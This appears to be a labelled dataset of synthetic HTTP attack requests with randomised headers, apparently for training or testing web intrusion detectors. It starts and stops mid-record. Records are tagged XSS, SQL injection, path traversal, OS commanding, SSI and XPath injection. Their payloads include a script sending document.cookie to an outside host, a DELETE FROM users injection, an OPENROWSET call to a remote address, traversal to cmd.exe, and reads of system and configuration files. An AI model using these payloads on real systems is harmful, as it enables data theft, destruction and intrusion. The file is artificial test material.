Expires: Thu, 15 Jun 06 22:12:00 GMT
Last-Modified: Fri, 05 Nov 04 01:09:13 GMT
Host: www.heooi3mcmi.gov
Connection: keep-alive
Accept: text/*, image/*
Accept-Charset: windows-1251
Accept-Encoding: gzip, gzip, gzip, deflate
Accept-Language: *
Cache-Control: max-stale=43
Client-ip: 223.102.217.31
Cookie: jhawoccn=ih(;u5<trlibboall%rts
Cookie2: $Version="477"
Date: Fri, 04 Mar 05 01:03:54 CET
ETag: "UasEgXZAUoa8Yhw8"
Expect: 100-continue
From: yhSsf@ahrg7dbN.com
If-Modified-Since: Thu, 07 Jan 10 15:04:34 GMT
If-Unmodified-Since: Tue, 09 Mar 10 12:16:46 UTC
If-Match: *
If-None-Match: "I._WofJ-xkYMZu_"
If-Range: "oyGgXVYLn2f.HERzf"
Max-Forwards: 0
MIME-Version: 8.8
Pragma: irrl=cayvhxo
Proxy-Authorization: Basic aXJ0d2E6cmVtaA==
Authorization: nltei epniie=dzlns
Range: 7-75,773-,28-851
Referer: /tnebf/tmIse/7eWmsleo/yoa8eh.mdb
TE: trailers,chunked;q=0.0
Trailer: If-Modified-Since
User-Agent: Mozilla/1.2 (X11; U; Open BSD i386 3.4; pr-aT; rv:7.7.1) Gecko/15760238
UA-CPU: MIPS
UA-Disp: 8272,2255,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 4356x362
Via: FTP/0.3 www.aect9.htm
Transfer-Encoding: compress
Upgrade: 1obltA/1.6, begaf/4.9, aje/5.5
Warning: 290 www.csV7.jpg "alupzEldm3wn" 
X-Forwarded-For: 20.191.23.124
X-Serial-Number: 890650544330146
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

qie=%+eofshtoi0emes&gexlnn8deHlzb=eha6ceiPabi4ob&8usrR5g1httpsz_=ent)(&(objectClass =   nai*)&kii8=rTe0tN6aldbHZwoBf&eenthod=818&EEasg=Orboot.ini&ENnew=767&hoz6F=cl0tHxcQz.4

End - Id: 37637
Start - Id: 48344
class: XPathInjection
GET /afarvdicr/iLuiKVVF2Io/tFu0-WoPmPbR1954R9/sqCIGfeztpDHS4TuNc.mspx?rtilhtrorrnp=Yxp_ipT3xmaadena%29te HTTP/1.0
Host: 130.14.225.223
Connection: close
Accept: */*
Accept-Charset: windows-1250, x-mac-arabic, windows-1250, iso-10646-ucs-2
Accept-Encoding: gzip;q=0.5, gzip, compress
Accept-Language: weBmsbp-ircge, Elian5v-o;q=0.9
Cache-Control: no-store
Client-ip: 56.179.89.170
Cookie: oIcrjOntnuoaCer=]e;euihyolNcsrA=cYnQo;heAN=088871964
Cookie2: $Version="8"
Date: Wed, 26 Oct 05 02:15:11 CET
ETag: "QLzToFNFZgA-WGQrB9"
Expect: sCbae=NsEera;lsae0ast
If-Modified-Since: Thu, 01 Nov 07 05:34:28 UTC
If-Unmodified-Since: Mon, 08 Mar 04 09:02:12 GMT
If-Match: *
If-None-Match: *
If-Range: "wHQjsgnV9cYty2xH"
Max-Forwards: 05
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: heeCz soatyo=hT9sri
Range: 7571-231,462-
Referer: /shbemq.dll
TE: chunked;q=0.8,trailers,deflate
Trailer: Accept-Language
User-Agent: tPbyeS'   or   6   <     count(path/child::*)    or    'O4yiru0'    = '
UA-Pixels: 784x5970
Via: 2.5 www.tdioemb.png
Transfer-Encoding: identity
Upgrade: ihoq4/1.0, oHxar/7.4, sms/8.7, rraA/0.1, hst/1.8
Warning: 837 147.54.34.5 "IinnttmopneddCTh1s2r" "Tue, 02 Mar 10 09:48:09 CET"
X-Forwarded-For: 18.177.33.102
X-Serial-Number: 215734

null

End - Id: 48344
Start - Id: 46916
class: XSS
POST /xeie2iptwsIsdtt/a0sidetzdponfPhd/eLCf/1rtoyaTOoiikn3Db/8DwH-./ttoIae.mdb? HTTP/1.1
Content-Length: 247
Content-Language: rDtarEe
Content-Encoding: gzip
Content-Location: http://www.t7ex.fr/witoue/ehts/rrIswTEt/k0bgsfc/tU7ce.dll
Content-MD5: ZHlFMGFoczFzaXJrSDRzYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 01 Apr 08 20:20:19 UTC
Last-Modified: Sun, 25 Jan 04 14:56:32 UTC
Host: 79.210.19.101:32749
Connection: TloOI2p
Accept: */*;q=0.6
Accept-Charset: cp-950, x-mac-greek, x-mac-ce;q=0.0, windows-1251;q=0.5, ks_c_5601-1987;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 67.18.221.141
Cookie: tah=rnf;msqh=eg4H0KLmR1;U2IJ_R-e-=544;GserdlhhEl1dmv=eRt6CUVrUww;0FdQ31n@J=e1ue%sdN/0dd7nuehttpsn\exec&
Cookie2: $Version="1"
Date: Fri, 01 Jul 05 10:05:52 GMT
ETag: W/"GrP4IKP7N3PcZKc1rE"
Expect: 100-continue
From: nlqn@timuoEgjAR.ch
If-Modified-Since: Tue, 28 Dec 04 16:44:26 UTC
If-Unmodified-Since: Sat, 20 Jan 07 24:06:00 GMT
If-Match: "ifgnEX6zRgo.d-5uoS"
If-None-Match: "cP5SBg1GzHpSSVKEf2EL"
If-Range: Sat, 29 Apr 06 03:10:29 CET
Max-Forwards: 67
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: NTLM Y2NlbUFhZmIzc3JobmUwMm14bGVyZWlpbWk4eGVUZzJocmVodGluRWl4aXRuaVo=
Authorization: Digest cnonce="reDjanEh"
Range: -790
Referer: http://www.ewrexnd.uk/tOKhr.ace
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.5 (X11; U; Unix 6.4; gh-pa; rv:4.1.6) Gecko/45950192
UA-CPU: MIPS
UA-Disp: 2330,130,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 537x7894
Via: 7.1 www.mRerr7t3.jpg, 4.0 177.44.101.16, HTTP/6.0 92.30.98.233
Transfer-Encoding: gzip
Upgrade: sdW/7.9, agrd/5.9, wt6wa9/7.2
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 3374825125599046
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Ttiwssmonetsh=xw43OfU&in a&t7uadniMC3toreh=668781&pLpstzrtOemr2o=SdttrtauefitwT&yoaSa8N2rCsoab=&{[document.location.replace ('http://www.dengne.com/cgi-bin/tironi.cgi'+document.cookie);]};&ultt8zIP=npmCkn nNepyh

End - Id: 46916
Start - Id: 44225
class: OsCommanding
GET ..%%35%63../..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.heig.ch:3339
Connection: close
Accept: */*
Accept-Charset: windows-1254;q=0.3, x-mac-greek;q=0.6, cp-936, iso-8859-4
Accept-Encoding: *
Accept-Language: nir-spnf;q=0.9, teaeS-gdlhd, wer2n1-hhA0d;q=0.8, ecaTI-dydiltnd;q=0.6
Cache-Control: max-stale
Client-ip: 224.86.31.255
Cookie: coit4elcsbneac=228;c0uwe2e=5596737
Cookie2: $Version="781"
Date: Wed, 09 Dec 09 21:47:51 CET
ETag: "YbIP.iawOLfpBceJ7ne"
Expect: L2fr=taeh2;o6alf
From: 37idSerd@ombp.uk
If-Modified-Since: Sun, 05 Sep 04 24:15:02 GMT
If-Unmodified-Since: Sun, 18 Mar 07 17:17:15 GMT
If-Match: *
If-None-Match: *
If-Range: "sfj@VJX@v8_BJpBn@uF"
Max-Forwards: 6119
MIME-Version: 1.8
Pragma: NuD='0dtugo9'
Proxy-Authorization: 6sNnyd isiMcw=RxsQAe
Authorization: Digest qop=auth-int
Range: 09660-850419
Referer: /lqtoBt/rmrsM/10isS/aymEiE.jpeg
TE: deflate,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.9 (compatible; MSIE 9.8; Win98; m3nros)
UA-CPU: PowerPC
UA-Disp: 220,5543,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 352x848
Via: 2.7 218.127.34.24
Transfer-Encoding: eioon; ioTauWiM=aiit3ka
Upgrade: eylet/4.8, moe/0.2, jtiu/7.5, ratas/1.7, ott/5.5
Warning: 096 42.244.161.150:67 "Tarraeaaint" "Sat, 16 Oct 04 16:51:00 GMT"
X-Forwarded-For: 65.185.122.174
X-Serial-Number: 33909969
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 44225
Start - Id: 36284
class: PathTransversal
GET /rclQEyeXr/yjB_wKqmnR2L1NV.shtml?ot9=%2Fetc%2Fhttpd%2Fhttpd.conf&qiled9enR=9534916&TBwuc7aaaeora=4hs HTTP/1.1
Host: 157.153.131.102:0872
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.8
Accept-Encoding: identity, deflate, compress;q=0.6
Accept-Language: 26d-sg;q=0.8, otcyw-sit, vsPbtbu-eOscy;q=0.6, visnbal-cfyt;q=0.7, x972-nfas
Cache-Control: only-if-cached
Client-ip: 114.100.144.6
Cookie: gsdp=lvBO5RCIPS;input2xdiv=8440557;aeefytTidndpTr=NvOacceptsa
Cookie2: $Version="483"
Date: Fri, 16 Jan 09 02:49:52 GMT
ETag: W/"q6q.v8V-N2IS8LHrY7i"
Expect: 100-continue
From: 7sEpze@hrhiarN7.de
If-Modified-Since: Sat, 11 Mar 06 19:55:46 GMT
If-Unmodified-Since: Tue, 06 Jan 04 17:48:11 UTC
If-Match: *
If-None-Match: "y8Xq4bDTXeoEe3-OrJF"
If-Range: "I_lM8h_X2LcpVp2.CIA"
Max-Forwards: 6
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: NTLM aXVmc2llbjJSZ2VvSGVlc2wwdW90N2FvYWV6ZXRyYWg=
Authorization: Digest uri=/ohyil/aroargkr/gi5s/ifatlbm/wsnitgp.asp
Range: 507970-,9199-
Referer: http://n7hws9s.it/AisA/mrtgs/bdhwe/ognEh/ecrCbie.mpeg
TE: trailers
Trailer: Accept-Encoding
User-Agent: ysibr/1.1.8
UA-CPU: StrongARM
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 1458x3720
Via: e2ti/4.5 189.99.140.214
Transfer-Encoding: identity
Upgrade: ye1nNS/5.5
Warning: 577 www.vkgsei.gif "nyhteteay" "Wed, 04 Jun 08 24:04:38 UTC"
X-Serial-Number: 3858869813582017
----: -----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 36284
Start - Id: 45294
class: PathTransversal
GET /kty6Gl.BLbn/8vDGvDW5NH/e8HTj78oillDV/9lX_KmS0rHB/nLhj39fxu6G_kJ/2kKaia9Jn4Wscript/aSpeDJ6/t1l3id1ak-hJv3@mF/nyXtCW0.jpg? HTTP/1.0
Host: www.lst9NiT.biz
Connection: tsst
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: /../../../../Inetpub/iissamples/icteetitte/asatas/asstmana/vend.sh
Accept-Language: ete4t-tr, seymbxm-e6mhj0r;q=0.0
Cache-Control: only-if-cached
Date: Tue, 16 Mar 10 02:55:04 UTC
ETag: "RUC6_eMpGbZsMGv2eAP"
Expect: eeun
If-Modified-Since: Sat, 25 Sep 04 16:55:16 UTC
If-Unmodified-Since: Sat, 09 May 09 10:45:35 GMT
If-Match: "axR.BfuF0jvJxJCZJ"
If-None-Match: "q5VQs.XF4hsm18s"
If-Range: Tue, 18 Nov 08 05:31:25 CET
Max-Forwards: 16
Pragma: hiuie='iaih'
Proxy-Authorization: dnhat tciorE=dIorDai
Authorization: Basic NnZlbjpzb2FiaGhl
Range: 59-5054,-329
Referer: /nenSsHt/n70tl/eAF9ih.cfm
TE: gzip,chunked;q=0.0
User-Agent: hd2zhloI (dZurnn4)
UA-OS: Win95
Via: 1.5 155.33.83.77, 5.8 58.181.76.38:8
Transfer-Encoding: xbNio; pethrsp=higu5
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 45294
Start - Id: 42539
class: SqlInjection
GET /vcskcmdetnqtuq/0qKDwSUc_VYuhJLFHQPC/AidogxoDZDdgWposition/iBKe.r/aRseMts/eC7D0/epomhsga7.shtml?we0=644&lthsnk20plhue=9anbiloiwsrrtn&ohshashichBG=%5Crv&Zva6StovZwYa=ewsda5ttgwxtttpmse&DhyO=8580703&ti=%3B+++++select++++*+from++OPENROWSET%28++++%27SQLoledb%27%2C%27uid%3D1scar%3Bpwd%3Dytmlcipkj8%3BNetwork%3DDBMSSOCN%3BAddress%3D95.76.50.55%2C32207%3B%27%2C%27select+*++++from+afa1%27+%29&yti=obkpy.XFxkiM&ps1o1xnHHse=+aEnElocation&nkjidilt0t=wr&dyo=m8Wb_4MbY&denLwha=t&httpsvyHAXe=le&rcaecpss=bor%3Bo%5B6ra%7C%3Ae%28d%26aj%40av&esjyonNsacah=7254&rt=tKK19ml HTTP/1.1
Host: www.sdc9nfrje.uk
Connection: l4ypd
Accept: image/png
Accept-Charset: euc-jp, x-mac-japanese, us-ascii
Accept-Encoding: compress;q=0.9, deflate
Accept-Language: rlae-sRs, nmla2rs-hawpi3, mr-scNxUs64
Cache-Control: only-if-cached
Client-ip: 144.73.242.147
Cookie: rsr0gl4n=ypeeruUet;dtre=rzi:rsm=\go;a7eisemh15h=s2GUqh1O@
Cookie2: $Version="76"
Date: Sat, 21 Mar 09 14:54:30 GMT
ETag: "YaiKF0rmASDK-26T"
Expect: oc967Rm
From: bs1as@pton6i0pc.org
If-Modified-Since: Tue, 11 Apr 06 05:07:46 UTC
If-Unmodified-Since: Tue, 21 Apr 09 01:33:47 CET
If-Match: "OdKa-wpU2-1m6YB"
If-None-Match: *
If-Range: Wed, 20 May 09 24:21:17 UTC
Max-Forwards: 5
MIME-Version: 3.7
Pragma: vncfeta=jgrxinin
Proxy-Authorization: NTLM b0ExbHI1Y3RnZjdpb0lhaWRwQXU1c2FsZG90dHNqdXRjcw==
Authorization: NTLM YWNjZ0FuRUd0aGVpb3djeWRlb3lnc3RBbGFlZHluczh1b3RidGx0bzNOSUU=
Range: 79786-446
Referer: /atdssk/tsiw.css
TE: trailers,trailers,gzip
Trailer: Via
User-Agent: Mozilla/7.9 (Machintosh; U; PPC 1.9; Dt-mb; rv:0.1.7) Gecko/90865286
UA-CPU: x86
UA-Disp: 1092,0849,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 8264x986
Via: si2s/3.6 94.215.143.145:721
Transfer-Encoding: compress
Upgrade: e2torm/4.8, rnb/5.6, cpieM/3.1, alfi/8.5
Warning: 787 15.186.185.51 "wdceb" 
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 1876106760
----: -----------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 42539
Start - Id: 42249
class: SqlInjection
GET /noTN9/var5sseqtuceir.js?bnio3sSjty=%27%29+++++UN%2F**%2FION++ALL++++SEL%2F**%2FECT++%27lessaflnoE%27%2C3%2C9%2C%27oejlas%27%2C9++FROM++++29++++WHERE+%28+++%27%27+%3D+%27&X9sock_streamjscscript.iFU=ctydl HTTP/1.0
Host: 109.54.59.12
Connection: close
Accept: image/png;q=0.7, video/*
Accept-Charset: iso-10646-ucs-2, windows-874;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: Doil='caaAtee'
Client-ip: 83.53.205.169
Cookie: eaergxsqesoL=31
Cookie2: $Version="201"
Date: Mon, 24 Jul 06 15:49:54 UTC
ETag: W/"3EUs5XR7C38VJfgd-18V"
Expect: 100-continue
From: ppnuhf@cKraaqblss.ch
If-Modified-Since: Sat, 17 May 08 16:55:56 GMT
If-Unmodified-Since: Tue, 14 Jul 09 08:21:23 CET
If-Match: "pnplux.2entWA86i"
If-None-Match: *
If-Range: "mRKc_7E519aC@pd-zp"
Max-Forwards: 801
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: NTLM aWd1eTNuZHNvSTdmd3VkeFJzcHFodHV0dHlmRGVsNm8=
Authorization: NTLM ZWxoZWF1aWl0MW5ldE0wZHcxd3FzeWxhc25udmZ3dXlzcGllcjVyd3NsdWhueXN4
Range: 4539-14148,-19,934-
Referer: /srzgr5/ciMet3dt.asmx
TE: chunked
Trailer: Accept-Language
User-Agent: eoltnsmshe/8.9
UA-CPU: PowerPC
UA-Disp: 8058,0040,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 108x2342
Via: HTTP/1.9 25.245.83.106
Transfer-Encoding: gzip
Upgrade: gtaeas/6.8, ae9e/5.6, rdaei/1.7, ilto/8.7, n5w/5.4
Warning: 939 3.193.4.247 "eeviCoadbEttmsy" 
X-Forwarded-For: 42.114.104.151
X-Serial-Number: 29366252
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42249
Start - Id: 44995
class: PathTransversal
GET /yisI/EwFya5ri2s/ncUooUZ4CLedpK2Q35Br/iFIP_j@KVv2l7m81lez/oh5Aahtcae0a/gakmqo6hsi/filh8tohowtdnc0/LEIFa2b0hpasswdLsNbodyM/DeU/ral8i4ueiSnton/tyT/iTMT6Lp9-mZ-msa.php3?kElewd7idHo3l=collection%28++file%3A%2F%2F%2Fc%3A%2Fsa9%2FnEsesp.xml+%29 HTTP/1.1
Host: www.essd.uk
Connection: close
Accept: */*;q=0.8
Accept-Charset: windows-1250;q=0.2, euc-tw;q=0.4, koi8
Accept-Encoding: deflate;q=0.6, deflate;q=0.2, deflate
Accept-Language: ae7ujtl-raetr01, 7dshAia-tfid;q=0.8
Cache-Control: no-transform
Cookie: 0ajNC=0ttRrg(u i/o4t;eohkt=Ezetd
Cookie2: $Version="420"
Date: Sun, 28 Nov 04 23:42:16 CET
From: SiHai3@Rl2imga.fr
If-Modified-Since: Tue, 28 Feb 06 06:47:44 GMT
If-Unmodified-Since: Wed, 05 Jul 06 08:37:33 GMT
If-Match: "OmSQiaRh@J3Bo@fP"
If-None-Match: "K14YnaS-04TXRkkXB"
If-Range: *
Max-Forwards: 8584
MIME-Version: 6.7
Pragma: Erlbctap='ctsoedr'
Authorization: Digest opaque="2pisTnto"
Referer: /eEiromS/used/atrakg2/ea7josi/zert.cfm
TE: gzip,trailers,trailers
User-Agent: tjU6qoD_Gp http://www.sje9.ch
UA-Pixels: 7442x124
Via: FTP/6.5 57.25.109.39
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44995
Start - Id: 41956
class: SqlInjection
GET /d6clsnu/e7ixNC41N9/0IUUSJI_sy3AFIZ/0hTHJG28KszaN@rM.php3?hteebyq3ajSgeUq=eto%27++++%29%3BDELETEFROMusersWHEREupper%28username%29+%3D+++upper%28+%27admin&t6oeDToasEe=7&eealghl=oZAAHifrYo%3A8ddt&is=844&nr=pre&gteCEstacelnn=tIn51VvLio HTTP/1.1
Host: 212.239.148.33
Connection: close
Accept: image/*, application/postscript;q=0.0
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: 4tdCrneC-umrtie;q=0.4, isi-xodeic;q=0.6, ld-a;q=0.5
Cache-Control: only-if-cached
Client-ip: 54.102.14.216
Cookie: 9XcBVs@=ebisbaof;7i5ti=scriptarthd
Cookie2: $Version="80"
Date: Sun, 06 Apr 08 21:39:10 UTC
ETag: W/"L5smUaADBs4uUok.30rh"
Expect: 2eweYa=sefI;hdtn
From: lbrsawDh@elfoa4b.fr
If-Modified-Since: Sun, 18 Jan 04 21:39:31 UTC
If-Unmodified-Since: Thu, 08 Oct 09 16:46:05 GMT
If-Match: *
If-None-Match: "lzrt-akqZh-eIEpQvG6U"
If-Range: "9r9VXT1jxARkjhw_HfrP"
Max-Forwards: 4540
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: hnhE hDht5a=uhdg0rxt
Range: 55660-
Referer: /ece9ft/eiarice6.wmn
TE: trailers
Trailer: Connection
User-Agent: 4nbsenri/6.9.8.1
UA-CPU: MIPS
UA-Disp: 4298,556,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1383x317
Via: HTTP/1.5 www.hnd0o.html, FTP/2.4 88.227.154.124:765
Transfer-Encoding: Goema; 1mdewo=fmrid0
Upgrade: ep1Mri/9.9, tcn/2.5, elb8/5.8, eeNie/7.6
Warning: 494 42.216.10.168:95428 "esi7pe3nyrrtei" "Wed, 28 Apr 10 16:07:09 UTC"
X-Forwarded-For: 88.3.128.18
X-Serial-Number: 41242078999326437
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41956
Start - Id: 40696
class: SSI
POST /b53gt/haaanr/asa4deai38ot/xtermyMSXZlinkGnSJjQ0O.htm? HTTP/1.0
Content-Length: 244
Content-Language: 1sa
Content-Encoding: compress
Content-Location: /k0u9elmr/uoukBrha/seex.php3
Content-MD5: c2hhMDZxZXVnZnl2YWRzdA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 13 Mar 08 02:30:43 UTC
Last-Modified: Mon, 17 Jul 06 10:34:54 UTC
Host: www.ii8dtt.net:83415
Connection: keep-alive
Accept: image/jpeg;q=0.5, video/*;q=0.9
Accept-Charset: iso-8859-8-i;q=0.5, euc-kr, iso-8859-4, x-mac-ce;q=0.4
Accept-Encoding: <!-- #include  virtual="c:\winnt\system.ini"  -->
Accept-Language: Lntr9iem-dardtoq
Cache-Control: max-stale
Client-ip: 124.75.125.17
Cookie: 9dsrted5jv=905;WnePta=h3HXRjKwEUo;agAdassarrt7Cao=uCeF;iBeEnopeIdpiz=24;hCn59=nmusr
Cookie2: $Version="69"
Date: Fri, 27 Oct 06 16:06:31 UTC
ETag: "T4e8K7mDA5IthqSOKFnb"
Expect: enuex
From: oerrkocy@ghhtptH.be
If-Modified-Since: Mon, 05 Nov 07 14:51:25 UTC
If-Unmodified-Since: Thu, 28 Aug 08 11:09:11 CET
If-Match: *
If-None-Match: "5EbBckrznpLeZfqw5"
If-Range: *
Max-Forwards: 86
MIME-Version: 0.5
Pragma: no-cache
Authorization: Digest qop=hne2
Referer: /rt4iR.mdb
TE: gzip,trailers
Trailer: If-Match
User-Agent: dntEtazctvenipIlf
UA-Disp: 8426,173,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 9987x854
Transfer-Encoding: identity
Warning: 251 9.118.239.90 "yaaesb0j5ittxltot" 
X-Forwarded-For: 91.217.86.40
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

samg7jR9%uvbscript=ssho&ai6adnddhb=iLpu&nnobphJg9t2wrsc=psinput%24oeeinserti%3Aet%3Eu5&wlaoovnt=%407+WrseNrtre+%28-0a&RwoGkifno=1&neyilaai4nwteu=rie8ddn1cK%3C-&sutlszqhqophItu=8338243&6lfh=g&B.MMDojSF1between=lttvn6uMe1ges&otlit7th8IasieL=Md2rz

End - Id: 40696
Start - Id: 39374
class: SSI
GET /0e/t_Kgf51Aqa7yohoqS1GX/ie/tMkBs/lAnb5sFxfaAEG0Uv7/ZC/hj.png?nreiZ51aNe=%3C%21--%23email+fromhost%3D%22www.eUh0hn.com%22+tohost%3D%22mailbox.wiN.com%22+message%3D%22saeE+ytmphXe+NtrPk9d+ehsner%22+fromaddress%3D%22raihg2.com%22+toaddress%3D%22t8n4.rlro.com%22+subject%3D%22t%22+sender%3D%22tes.com%22+replyto%3D%22Ptsse0.com%22+cc%3D%22scc%22+inreplyto%3D%22ekihe+hrd+Wo4%22+id%3D%22isehmail%22+--%3E&wirtee=62263&seani7R7nPFh=hbjwenwt6&io=htbinl12e%7Ewheree%27Adw&1nyate8fxhe=922&ntgdenee895eot=763&ocnhe1hfcshe=9ipdm9KzJAb&6.xSr=oE&tlirf9bnruU=emeKtbnAraswDa&n4sj2o2=48447101 HTTP/1.1
Host: 111.246.171.56:80
Connection: keep-alive
Accept: application/*, video/quicktime;q=0.3
Accept-Charset: x-mac-roman;q=0.3, windows-1252;q=0.8, x-mac-arabic;q=0.0, koi8;q=0.0, iso-8859-15;q=0.9
Accept-Encoding: gzip, deflate;q=0.5
Accept-Language: N0e-ocEq;q=0.3, gUneny-3yo, on-Iu;q=0.2
Cache-Control: max-stale=5133
Client-ip: 19.66.228.157
Cookie: xhonfh3lWa=owQGP2rYXL7o
Cookie2: $Version="99"
Date: Thu, 31 Dec 09 22:00:10 UTC
ETag: W/"V0rv.@Ny6ITSV709evc"
Expect: 100-continue
From: lrS1n@ltwen24wwu.net
If-Modified-Since: Fri, 11 Aug 06 02:32:20 CET
If-Unmodified-Since: Sun, 01 May 05 07:58:35 CET
If-Match: "p1yHeFT9Dtrw-Mj"
If-None-Match: "ItNHGv2j75thLlL5-"
If-Range: Sat, 28 Feb 04 08:18:45 GMT
Max-Forwards: 7
MIME-Version: 0.0
Pragma: At=lh
Proxy-Authorization: NTLM N3RGc3RpbGRnanRleWRzUGthc3MwcmVldGlESmo4ck4=
Authorization: Digest nonce
Range: -7403,569103-
Referer: http://cgtb.cz/trmX6b/notEiu/mibza/ogxeu/tusc.msf
TE: gzip,chunked;q=0.6,chunked
Trailer: If-Modified-Since
User-Agent: Mozilla/1.8 (Machintosh; U; PPC Mac OS X 0.1; 9P-nl; rv:2.0.5) Gecko/02976243
UA-CPU: 68000
UA-Disp: 939,8855,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3402x217
Via: srf/7.1 102.213.77.230, 8.4 www.cvnejn.shtml, auZPn/6.5 www.8erenawr.gif:163
Transfer-Encoding: baag
Upgrade: Dimzxj/0.5, brr9/9.8, nqe8/0.3
Warning: 190 47.240.214.57 "eTmefeexEnteh0llLor" "Fri, 17 Feb 06 05:54:12 UTC"
X-Forwarded-For: 98.145.13.52
X-Serial-Number: 687226920
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 39374
Start - Id: 39415
class: SSI
GET /thklaipi/mV9nfoFgwiB/J3x@vftpXP4wK/sH4ll.php3?tt52yHgiafixxem=doheep%3Bs&efa=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&mqenaeth=03754&wtooepOas5=772364537&asard=6793 HTTP/1.0
Host: www.nuwEs.biz
Connection: Hgn7eaiA
Accept: audio/x-wav, application/*;q=0.6, audio/x-wav;q=0.2
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: eea=o
Client-ip: 123.202.136.228
Cookie: E4tsa2=sO8Z;dsas=eole
Cookie2: $Version="891"
Date: Sun, 20 Jun 04 21:12:40 GMT
ETag: "gFaCTXTMM3uIhv8kx"
Expect: 100-continue
If-Modified-Since: Tue, 09 Sep 08 04:07:06 CET
If-Unmodified-Since: Sat, 13 Sep 08 13:46:17 CET
If-Match: *
If-None-Match: "sGRfe6R-RBCty.SHb"
If-Range: Sun, 28 Feb 10 04:48:28 GMT
Max-Forwards: 866
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: NTLM TnN0dGVxMXJlaHFlYWFwYXdNUmxydGptb2F0dHRzYXN5
Authorization: Basic c2kyQjpnb3Zp
Range: 747370-38132,5734-
Referer: /ereu.rar
TE: gzip,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/0.1 (X11; U; Open BSD i586 5.8; sa-fm; rv:4.9.7) Gecko/99483277
UA-CPU: StrongARM
UA-Disp: 9324,2062,8
UA-Color: color8
UA-Pixels: 4162x972
Via: FTP/6.2 www.ptre4acH.html, 6.4 173.149.224.86
Transfer-Encoding: gzip
Warning: 888 www.w8hrkSm.jpg "csloteoenmscieaoOe" "Tue, 16 May 06 20:10:54 GMT"
X-Serial-Number: 15636847207020
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39415
Start - Id: 46723
class: XSS
GET /wfXoybisw@-TC/utgp2tsehtds/t3o/M6system4s/eiyynttnln9s.bin?hph=dS8ohjKF HTTP/1.1
Host: www.6rOvc.net
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: 1ggc4-ngeohce, elbybpas-EsporcV
Cache-Control: only-if-cached
Client-ip: 84.224.20.209
Cookie: sn0c=i+chttpsi;erd=<div style =   "     behaviour:  url([http://www.icisllns.com/script/aaaseomG.exe]);   "    >;wsL7Hqlon=5eeTW;oonrsiy=oiYA3prhttptswherefeP$ipassthruj~j;WvCFva=ar34t:Rsslx;szFcmUenw=a
Cookie2: $Version="8"
Date: Mon, 08 Jan 07 16:14:16 GMT
Expect: gtarr
If-Modified-Since: Mon, 28 Apr 08 11:29:17 GMT
If-Unmodified-Since: Mon, 16 Feb 04 04:09:05 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 26 Oct 07 22:42:28 CET
Max-Forwards: 8911
MIME-Version: 5.6
Pragma: no-cache
Referer: /eoee/8tmuufme.png
User-Agent: Mozilla/1.2 (X11; U; Unix 7.3; s5-ea; rv:0.8.9) Gecko/33293305
UA-CPU: StrongARM
UA-Disp: 7890,9337,16
UA-OS: Windows 98
Via: 5.3 www.xine.htm
Transfer-Encoding: deflate
Upgrade: eTo/0.4, mceii/2.5
Warning: 811 www.ice8e2sa.htm "Sirlceliob7aol" "Wed, 13 Apr 05 17:59:47 UTC"
X-Forwarded-For: 101.237.144.23
----: -----------------------

null

End - Id: 46723
Start - Id: 41782
class: SqlInjection
